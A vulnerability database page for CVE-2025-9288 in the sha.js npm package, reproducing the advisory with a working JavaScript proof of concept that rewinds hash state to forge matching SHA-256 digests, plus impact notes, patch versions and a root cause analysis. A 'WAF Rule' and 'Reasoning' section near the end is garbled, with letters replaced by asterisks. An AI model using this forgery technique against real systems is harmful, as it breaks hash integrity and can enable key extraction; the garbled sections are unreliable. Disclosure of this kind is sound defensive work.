N/A

CVSS Score

Basic Information

CVE ID

CVE-2025-9288

GHSA ID

GHSA-95m3-7q98-8xr5

EPSS Score

0.24348%

CWE

CWE-20

Published

8/21/2025

Updated

8/21/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-9288

CVE-2025-9288: sha.js is missing type checks leading to hash rewind and passing on crafted data

Summary

This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.

Missing input type checks lead to it calculating invalid values, hanging, rewinding the hash state (including turning a tagged hash into an untagged hash) on malicious JSON-stringifyable input

Details

See PoC

PoC

const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])

const sha = require('sha.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = sha('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe

Or just:

> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'

Impact

Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
DoS on {length:'1e99'}
On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

CVE-2025-9288

GHSA ID

GHSA-95m3-7q98-8xr5

EPSS Score

0.24348%

CWE

CWE-20

Published

8/21/2025

Updated

8/21/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
sha.js	npm	<= 2.4.11	2.4.12

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The analysis of the provided security advisory and the associated commit f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5 points directly to the Hash.prototype.update function in hash.js as the source of the vulnerability. The vulnerability is a classic case of improper input validation (CWE-20). The function was designed to accept data for hashing but failed to account for malicious, non-standard inputs. The Proof of Concept demonstrates that by passing an object with a negative length property to the update function, an attacker can effectively rewind the hashing process, leading to a scenario where different inputs can produce identical hashes. This fundamentally breaks the cryptographic security guarantees of the hashing algorithm. The fix, which involves replacing a simple string check with a call to the to-buffer library, confirms that the weakness was in the handling of the input data. The to-buffer library is designed to safely convert various JavaScript types into a Buffer, thereby sanitizing the input before it is processed by the hashing logic. Therefore, any runtime profile or stack trace captured during the exploitation of this vulnerability would show the Hash.update function as the entry point for the malicious data.

Vulnerable functions

Hash.update

hash.js

The vulnerability lies in the `update` method of the `Hash` class. The original implementation did not properly validate the `data` input. It only checked for strings, leaving it vulnerable to crafted objects. An attacker could provide an object with a manipulated `length` property (e.g., `{ length: -3 }`) to rewind the internal state of the hash calculation. This could be exploited to create hash collisions, where different inputs produce the same hash. The patch addresses this by using the `to-buffer` library, which ensures the input is always converted to a safe Buffer, thus preventing the state manipulation.

WAF Protection Rules

WAF Rule

### Summ*ry T*is is t** s*m* *s [**S*-*pq*-**pm-**r*](*ttps://*it*u*.*om/*rows*ri*y/*ip**r-**s*/s**urity/**visori*s/**S*-*pq*-**pm-**r*) *ut just *or `s**.js`, *s it **s its own impl*m*nt*tion. Missin* input typ* ****ks l*** to it **l*ul*tin* inv*l

Reasoning

T** *n*lysis o* t** provi*** s**urity **visory *n* t** *sso*i*t** *ommit `****************************************` points *ir**tly to t** `**s*.prototyp*.up**t*` *un*tion in `**s*.js` *s t** sour** o* t** vuln*r**ility. T** vuln*r**ility is * *l*ssi

N/A

Basic Information

Concerned about an active attack path?

CVE-2025-9288: sha.js is missing type checks leading to hash rewind and passing on crafted data

Summary

Details

PoC

Impact

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI